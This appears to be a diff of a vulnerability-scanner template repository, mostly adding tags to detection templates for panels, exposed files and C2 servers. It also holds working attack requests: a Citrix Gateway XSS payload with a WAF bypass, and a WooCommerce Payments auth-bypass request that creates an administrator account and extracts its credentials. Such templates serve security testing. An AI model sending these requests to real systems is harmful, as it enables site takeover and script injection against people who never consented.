cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1 cvss-score: 6.1
cve-id: CVE-2023-24488 cve-id: CVE-2023-24488
cwe-id: CWE-79 cwe-id: CWE-79
metadata: metadata:
max-request: 1 max-request: 2
shodan-query: title:"Citrix Gateway" shodan-query: title:"Citrix Gateway"
tags: cve,cve2023,citrix,xss,adc tags: cve,cve2023,citrix,xss,adc
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E'
- '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>' - '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>'
stop-at-first-match: true
matchers-condition: and
matchers: matchers:
- type: dsl - type: word
dsl: part: body
- 'contains(body, "<script>alert(document.domain)</script>")' words:
- 'contains(to_lower(body), "content-type: text/html")' - <body x='&'onload="(alert)('citrix akamai bypass')">
- 'status_code == 302' - <script>alert(document.domain)</script>
condition: and condition: or
- type: word
part: body
words:
- "Content-Type: text/html"
- type: status
status:
- 302

View File

@ -0,0 +1,69 @@
id: CVE-2023-28121
info:
name: WooCommerce Payments - Unauthorized Admin Access
author: DhiyaneshDK
severity: critical
description: |
An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.
reference:
- https://github.com/gbrsh/CVE-2023-28121
- https://nvd.nist.gov/vuln/detail/CVE-2023-28121
- https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/
- https://woocommerce.com/products/woocommerce-payments/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-28121
cwe-id: CWE-287,CWE-287
epss-score: 0.0021
cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
google-query: inurl:/wp-content/plugins/woocommerce-payments
publicwww-query: /wp-content/plugins/woocommerce-payments
vendor: automattic
product: woocommerce_payments
framework: wordpress
tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive
variables:
username: "{{rand_base(6)}}"
password: "{{rand_base(8)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
Content-Type: application/x-www-form-urlencoded
rest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"registered_date":'
- '"username":'
- '"email":'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 201
extractors:
- type: dsl
dsl:
- '"WP_USERNAME: "+ username'
- '"WP_PASSWORD: "+ password'

View File

@ -0,0 +1,30 @@
id: arangodb-web-interface
info:
name: ArangoDB Web Interface - Detect
author: pussycat0x
severity: info
description: |
ArangoDB Web Interface was detected.
reference:
- https://www.arangodb.com/docs/stable/
metadata:
max-request: 1
shodan-query: http.title:"ArangoDB Web Interface"
verified: "true"
tags: panel,arangodb,login
http:
- method: GET
path:
- "{{BaseURL}}/_db/_system/_admin/aardvark/index.html"
matchers-condition: and
matchers:
- type: word
words:
- "<title>ArangoDB Web Interface</title>"
- type: status
status:
- 200

View File

@ -9,7 +9,7 @@ info:
- https://enterprise.arcgis.com/en/ - https://enterprise.arcgis.com/en/
classification: classification:
cwe-id: CWE-200 cwe-id: CWE-200
tags: api,arcgis,cms tags: api,arcgis,cms,panel
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -7,7 +7,7 @@ info:
description: AVTECH AVC798HA DVR is susceptible to information exposure. CGI scripts in the /cgi-bin/nobody directory can be accessed without authentication. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. description: AVTECH AVC798HA DVR is susceptible to information exposure. CGI scripts in the /cgi-bin/nobody directory can be accessed without authentication. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference: reference:
- http://www.avtech.com.tw/ - http://www.avtech.com.tw/
tags: dvr,exposure,avtech tags: dvr,exposure,avtech,panel
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -10,7 +10,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: html:"AWS EC2 Auto Scaling Lab" shodan-query: html:"AWS EC2 Auto Scaling Lab"
tags: exposure,ec2,aws,amazon tags: exposure,ec2,aws,amazon,panel
http: http:
- method: GET - method: GET

View File

@ -12,7 +12,7 @@ info:
max-request: 1 max-request: 1
shodan-query: http.html_hash:-1957161625 shodan-query: http.html_hash:-1957161625
verified: "true" verified: "true"
tags: c2,bruteratel,c4 tags: c2,bruteratel,c4,panel
http: http:
- method: GET - method: GET

View File

@ -12,7 +12,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: ssl:”Covenant” http.component:”Blazor” shodan-query: ssl:”Covenant” http.component:”Blazor”
tags: c2,ir,osint,covenant tags: c2,ir,osint,covenant,panel
http: http:
- method: GET - method: GET

View File

@ -12,7 +12,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: http.html_hash:-14029177 shodan-query: http.html_hash:-14029177
tags: c2,ir,osint,deimosc2 tags: c2,ir,osint,deimosc2,panel
http: http:
- method: GET - method: GET

View File

@ -13,7 +13,7 @@ info:
censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc
max-request: 1 max-request: 1
verified: "true" verified: "true"
tags: c2,ir,osint,empire tags: c2,ir,osint,empire,panel
http: http:
- method: GET - method: GET

View File

@ -12,7 +12,7 @@ info:
censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d
max-request: 1 max-request: 1
verified: "true" verified: "true"
tags: tech,evilginx,c2,phishing tags: tech,evilginx,c2,phishing,panel
http: http:
- method: GET - method: GET

View File

@ -13,7 +13,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: 'ssl:Mythic port:7443' shodan-query: 'ssl:Mythic port:7443'
tags: c2,ir,osint,mythic tags: c2,ir,osint,mythic,panel
http: http:
- method: GET - method: GET

View File

@ -10,7 +10,7 @@ info:
censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572
max-request: 1 max-request: 1
verified: "true" verified: "true"
tags: tech,nh,c2 tags: tech,nh,c2,panel
http: http:
- method: GET - method: GET

View File

@ -13,7 +13,7 @@ info:
max-request: 1 max-request: 1
shodan-query: http.html_hash:1015055567 shodan-query: http.html_hash:1015055567
verified: "true" verified: "true"
tags: tech,viper,c2,malware,ir tags: tech,viper,c2,malware,ir,panel
http: http:
- method: GET - method: GET

View File

@ -11,7 +11,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0 cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: tech,cacti,login tags: tech,cacti,login,panel
metadata: metadata:
max-request: 2 max-request: 2

View File

@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0 cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: login,tech,synology,rackstation tags: login,tech,synology,rackstation,panel
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -10,7 +10,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: html:"Crontab UI" shodan-query: html:"Crontab UI"
tags: exposure,crontab,ui tags: exposure,crontab,ui,panel
http: http:
- method: GET - method: GET

View File

@ -0,0 +1,34 @@
id: dell-idrac
info:
name: Dell IDRAC Panel - Detect
author: kazet
severity: info
description: Dell IDRAC panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
metadata:
max-request: 2
shodan-query: html:"thisIDRACText"
verified: true
tags: panel,idrac,dell,detect
http:
- method: GET
path:
- '{{BaseURL}}/restgui/start.html'
- '{{BaseURL}}/login.html'
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- '<idrac-start-screen'
- 'thisIDRACText'
condition: or
- type: status
status:
- 200

View File

@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0 cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: login,tech,edgeos,edgemax tags: login,tech,edgeos,edgemax,panel
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -10,7 +10,7 @@ info:
max-request: 2 max-request: 2
verified: true verified: true
shodan-query: title:"EOS HTTP Browser" shodan-query: title:"EOS HTTP Browser"
tags: exposure,eos,httpbrowser tags: exposure,eos,httpbrowser,panel
http: http:
- method: GET - method: GET

View File

@ -14,7 +14,7 @@ info:
max-request: 2 max-request: 2
verified: true verified: true
shodan-query: title:"Mailing Lists" shodan-query: title:"Mailing Lists"
tags: exposure,mailman tags: exposure,mailman,panel
http: http:
- method: GET - method: GET

View File

@ -9,7 +9,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0 cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: tech,consul,api tags: tech,consul,api,panel
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -11,7 +11,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0 cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: tech,konga,oss tags: tech,konga,oss,panel
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -12,7 +12,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
fofa-query: app="Kubernetes-Enterprise-Manager" fofa-query: app="Kubernetes-Enterprise-Manager"
tags: tech,kubernetes tags: tech,kubernetes,panel
http: http:
- method: GET - method: GET

View File

@ -14,7 +14,7 @@ info:
verified: true verified: true
shodan-query: http.html:"Mirantis Kubernetes Engine" shodan-query: http.html:"Mirantis Kubernetes Engine"
fofa-query: app="Mirantis-Kubernetes-Engine" fofa-query: app="Mirantis-Kubernetes-Engine"
tags: tech,kubernetes,devops,kube,k8s tags: tech,kubernetes,devops,kube,k8s,panel
http: http:
- method: GET - method: GET

View File

@ -14,7 +14,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: http.favicon.hash:-379154636 shodan-query: http.favicon.hash:-379154636
tags: exposure,k8s,kubernetes,kubeview,dashboard tags: exposure,k8s,kubernetes,kubeview,dashboard,panel
http: http:
- method: GET - method: GET

View File

@ -13,7 +13,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: http.component:"Magento" shodan-query: http.component:"Magento"
tags: magento,exposure tags: magento,exposure,panel
http: http:
- method: GET - method: GET

View File

@ -11,7 +11,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0 cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: tech,mautic,crm tags: tech,mautic,crm,panel
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -12,7 +12,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: http.title:"Neo4j Browser" shodan-query: http.title:"Neo4j Browser"
tags: neo4j,exposure,unauth tags: neo4j,exposure,unauth,panel
http: http:
- method: GET - method: GET

View File

@ -10,7 +10,7 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
shodan-query: http.title:"OpenWrt - LuCI" shodan-query: http.title:"OpenWrt - LuCI"
tags: openwrt,router tags: openwrt,router,panel
http: http:
- method: GET - method: GET

View File

@ -10,7 +10,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: html:"PDI Intellifuel" shodan-query: html:"PDI Intellifuel"
tags: exposure,pdi,intellifuel tags: exposure,pdi,intellifuel,panel
http: http:
- method: GET - method: GET

View File

@ -4,7 +4,7 @@ info:
name: Pulse Secure Version name: Pulse Secure Version
author: dadevel author: dadevel
severity: info severity: info
tags: pulse tags: pulse,panel
metadata: metadata:
max-request: 2 max-request: 2

View File

@ -13,7 +13,7 @@ info:
max-request: 4 max-request: 4
verified: true verified: true
google-query: intitle:"Roxy file manager" google-query: intitle:"Roxy file manager"
tags: tech,fileupload,roxy,fileman tags: tech,fileupload,roxy,fileman,panel
http: http:
- method: GET - method: GET

View File

@ -4,7 +4,7 @@ info:
name: Synology RackStation Login Detect name: Synology RackStation Login Detect
author: princechaddha author: princechaddha
severity: info severity: info
tags: login,tech,synology,rackstation tags: login,tech,synology,rackstation,panel
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -7,7 +7,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: title:"Apache Tomcat" shodan-query: title:"Apache Tomcat"
tags: version,tomcat,docs tags: version,tomcat,docs,panel
http: http:
- method: GET - method: GET

View File

@ -10,7 +10,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: http.favicon.hash:824580113 shodan-query: http.favicon.hash:824580113
tags: exposure,login,tup,openframe tags: exposure,login,tup,openframe,panel
http: http:
- method: GET - method: GET

View File

@ -8,7 +8,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: http.html:"VMG1312-B10D" shodan-query: http.html:"VMG1312-B10D"
tags: tech,zyxel,modem,router tags: tech,zyxel,modem,router,panel
http: http:
- method: GET - method: GET

View File

@ -8,7 +8,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: http.html:"VSG1432-B101" shodan-query: http.html:"VSG1432-B101"
tags: tech,zyxel,modem,router tags: tech,zyxel,modem,router,panel
http: http:
- method: GET - method: GET

View File

@ -13,7 +13,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: http.title:"Welcome to your Strapi app" shodan-query: http.title:"Welcome to your Strapi app"
tags: api,strapi tags: api,strapi,exposure
http: http:
- method: GET - method: GET

View File

@ -11,7 +11,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0 cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: azure,microsoft,cloud tags: azure,microsoft,cloud,exposure
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -7,7 +7,7 @@ info:
description: eSMTP configuration was discovered. description: eSMTP configuration was discovered.
reference: reference:
- https://linux.die.net/man/5/esmtprc - https://linux.die.net/man/5/esmtprc
tags: esmtp,config tags: esmtp,config,exposure
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -10,7 +10,7 @@ info:
max-request: 8 max-request: 8
verified: true verified: true
shodan-query: html:"JK Status Manager" shodan-query: html:"JK Status Manager"
tags: config,jk,status tags: config,jk,status,exposure
http: http:
- method: GET - method: GET

View File

@ -11,7 +11,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0 cvss-score: 0.0
cwe-id: CWE-200 cwe-id: CWE-200
tags: keycloak,config tags: keycloak,config,exposure
metadata: metadata:
max-request: 2 max-request: 2

View File

@ -10,7 +10,7 @@ info:
cwe-id: CWE-200 cwe-id: CWE-200
description: A MongoDB credentials file used by RoboMongo was detected. description: A MongoDB credentials file used by RoboMongo was detected.
reference: https://robomongo.org/ reference: https://robomongo.org/
tags: mongodb,robomongo,disclosure,config tags: mongodb,robomongo,disclosure,config,exposure
metadata: metadata:
max-request: 2 max-request: 2

View File

@ -4,7 +4,7 @@ info:
name: AWS S3 keys Leak name: AWS S3 keys Leak
author: r12w4n author: r12w4n
severity: high severity: high
tags: aws,s3,wordpress,disclosure tags: aws,s3,wordpress,disclosure,exposure
metadata: metadata:
max-request: 2 max-request: 2

View File

@ -8,7 +8,7 @@ info:
max-request: 2 max-request: 2
verified: true verified: true
github-query: filename:libs.versions.toml github-query: filename:libs.versions.toml
tags: file,gradle tags: file,gradle,exposure
http: http:
- method: GET - method: GET

View File

@ -16,7 +16,7 @@ info:
max-request: 3 max-request: 3
verified: true verified: true
google-query: intitle:"index of" "WebServers.xml" google-query: intitle:"index of" "WebServers.xml"
tags: jetbrains,config,edb,files tags: jetbrains,config,edb,files,exposure
http: http:
- method: GET - method: GET

View File

@ -9,7 +9,7 @@ info:
max-request: 3 max-request: 3
verified: true verified: true
google-query: intitle:"index of" "settings.yml" google-query: intitle:"index of" "settings.yml"
tags: misconfig,redmine,devops,files tags: misconfig,redmine,devops,files,exposure
http: http:
- method: GET - method: GET

View File

@ -9,7 +9,7 @@ info:
max-request: 4 max-request: 4
verified: true verified: true
google-query: intitle:"index of" "secrets.yml" google-query: intitle:"index of" "secrets.yml"
tags: misconfig,cloud,devops,files tags: cloud,devops,files,exposure,misconfig
http: http:
- method: GET - method: GET

View File

@ -11,7 +11,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3 cvss-score: 5.3
cwe-id: CWE-200 cwe-id: CWE-200
tags: expose,listing,config,logs,storage,edb,files tags: expose,listing,config,logs,storage,edb,files,exposure
metadata: metadata:
max-request: 6 max-request: 6

View File

@ -4,7 +4,7 @@ info:
name: Publicly accessible access-log file name: Publicly accessible access-log file
author: sheikhrishad author: sheikhrishad
severity: low severity: low
tags: logs tags: logs,exposure
metadata: metadata:
max-request: 4 max-request: 4

View File

@ -6,7 +6,7 @@ info:
severity: high severity: high
reference: reference:
- https://twitter.com/damian_89_/status/1250721398747791360 - https://twitter.com/damian_89_/status/1250721398747791360
tags: tech,clockwork tags: tech,clockwork,exposure
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -8,7 +8,7 @@ info:
and more. and more.
reference: reference:
- https://laravel.com/docs/8.x/telescope - https://laravel.com/docs/8.x/telescope
tags: laravel,disclosure,logs tags: laravel,disclosure,logs,exposure
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -12,7 +12,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: http.title:"RouterOS router configuration page" shodan-query: http.title:"RouterOS router configuration page"
tags: panel,router,routeros tags: panel,router,routeros,iot
http: http:
- method: GET - method: GET

View File

@ -11,6 +11,8 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2 cvss-score: 7.2
cwe-id: CWE-79 cwe-id: CWE-79
metadata:
max-request: 1
tags: xss,misc tags: xss,misc
http: http:

View File

@ -7,7 +7,7 @@ info:
description: Aws container metadata content description: Aws container metadata content
reference: reference:
- https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect - https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect
tags: aws,docker,ec2 tags: aws,docker,ec2,misc
metadata: metadata:
max-request: 2 max-request: 2

View File

@ -8,7 +8,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: http.html:"multipart/form-data" html:"file" shodan-query: http.html:"multipart/form-data" html:"file"
tags: exposure,upload,form tags: exposure,upload,form,misc
http: http:
- method: GET - method: GET

View File

@ -7,7 +7,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: title:"Microsoft Azure Web App - Error 404" shodan-query: title:"Microsoft Azure Web App - Error 404"
tags: error,azure,microsoft tags: error,azure,microsoft,misc
http: http:
- method: GET - method: GET

View File

@ -11,7 +11,7 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" shodan-query: http.title:"Conductor UI", http.title:"Workflow UI"
tags: tech,netflix,conductor,api tags: tech,netflix,conductor,api,misc
http: http:
- method: GET - method: GET

View File

@ -6,7 +6,7 @@ info:
severity: low severity: low
reference: reference:
- https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
tags: adobe,disclosure,packetstorm tags: adobe,disclosure,packetstorm,misconfig
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -4,7 +4,7 @@ info:
name: Adobe Connect Central Version name: Adobe Connect Central Version
author: dhiyaneshDk author: dhiyaneshDk
severity: info severity: info
tags: adobe tags: adobe,misconfig
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -9,7 +9,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem tags: aem,misconfig
http: http:
- method: GET - method: GET

View File

@ -9,7 +9,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem tags: aem,misconfig
http: http:
- method: GET - method: GET

View File

@ -16,7 +16,7 @@ info:
shodan-query: shodan-query:
- http.title:"AEM Sign In" - http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager" - http.component:"Adobe Experience Manager"
tags: xss,aem,adobe tags: xss,aem,adobe,misconfig
http: http:
- method: GET - method: GET

View File

@ -11,7 +11,7 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem,adobe tags: aem,adobe,misconfig
http: http:
- raw: - raw:

View File

@ -11,7 +11,7 @@ info:
shodan-query: shodan-query:
- http.title:"AEM Sign In" - http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager" - http.component:"Adobe Experience Manager"
tags: exposure,aem,adobe tags: exposure,aem,adobe,misconfig
http: http:
- method: GET - method: GET

View File

@ -11,7 +11,7 @@ info:
metadata: metadata:
max-request: 64 max-request: 64
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem,adobe tags: aem,adobe,misconfig
http: http:
- method: GET - method: GET

View File

@ -9,7 +9,7 @@ info:
metadata: metadata:
max-request: 29 max-request: 29
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem tags: aem,misconfig
http: http:
- method: GET - method: GET

View File

@ -11,7 +11,7 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem,adobe,hackerone tags: aem,adobe,hackerone,misconfig
http: http:
- method: GET - method: GET

View File

@ -9,7 +9,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem tags: aem,misconfig
http: http:
- raw: - raw:

View File

@ -7,7 +7,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem tags: aem,misconfig
http: http:
- raw: - raw:

View File

@ -11,7 +11,7 @@ info:
metadata: metadata:
max-request: 3 max-request: 3
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem,adobe tags: aem,adobe,misconfig
http: http:
- method: GET - method: GET

View File

@ -9,7 +9,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem tags: aem,misconfig
http: http:
- method: GET - method: GET

View File

@ -9,7 +9,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem tags: aem,misconfig
http: http:
- method: GET - method: GET

View File

@ -9,7 +9,7 @@ info:
metadata: metadata:
max-request: 4 max-request: 4
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem tags: aem,misconfig
http: http:
- method: GET - method: GET

View File

@ -11,7 +11,7 @@ info:
metadata: metadata:
max-request: 8 max-request: 8
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem,adobe tags: aem,adobe,misconfig
http: http:
- method: GET - method: GET

View File

@ -16,7 +16,7 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem,xss tags: aem,xss,misconfig
http: http:
- method: GET - method: GET

View File

@ -8,7 +8,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem,bruteforce tags: aem,bruteforce,misconfig
http: http:
- method: GET - method: GET

View File

@ -9,7 +9,7 @@ info:
metadata: metadata:
max-request: 1 max-request: 1
shodan-query: http.component:"Adobe Experience Manager" shodan-query: http.component:"Adobe Experience Manager"
tags: aem tags: aem,misconfig
http: http:
- method: GET - method: GET

View File

@ -18,7 +18,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2 cvss-score: 7.2
cwe-id: CWE-79 cwe-id: CWE-79
tags: xss,aem,adobe tags: xss,aem,adobe,misconfig
http: http:
- method: GET - method: GET

View File

@ -8,7 +8,7 @@ info:
max-request: 1 max-request: 1
verified: true verified: true
shodan-query: title:"Airflow - DAGs" shodan-query: title:"Airflow - DAGs"
tags: apache,airflow,fpd tags: apache,airflow,fpd,misconfig
http: http:
- method: GET - method: GET

View File

@ -7,7 +7,7 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
shodan-query: title:"Airflow - DAGs" shodan-query: title:"Airflow - DAGs"
tags: apache,airflow,unauth tags: apache,airflow,unauth,misconfig
http: http:
- method: GET - method: GET

View File

@ -15,7 +15,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2 cvss-score: 7.2
cwe-id: CWE-79 cwe-id: CWE-79
tags: akamai,xss tags: akamai,xss,misconfig
metadata: metadata:
max-request: 1 max-request: 1

View File

@ -15,7 +15,7 @@ info:
metadata: metadata:
max-request: 204 max-request: 204
verified: true verified: true
tags: cache,poisoning,generic,xss,akamai,s3 tags: cache,poisoning,generic,xss,akamai,s3,misconfig
variables: variables:
rand: "{{rand_base(5)}}" rand: "{{rand_base(5)}}"

View File

@ -4,7 +4,7 @@ info:
name: Alibaba Mongoshake Unauth name: Alibaba Mongoshake Unauth
author: pikpikcu author: pikpikcu
severity: info severity: info
tags: mongoshake,unauth,alibaba tags: mongoshake,unauth,alibaba,misconfig
metadata: metadata:
max-request: 1 max-request: 1

Some files were not shown because too many files have changed in this diff Show More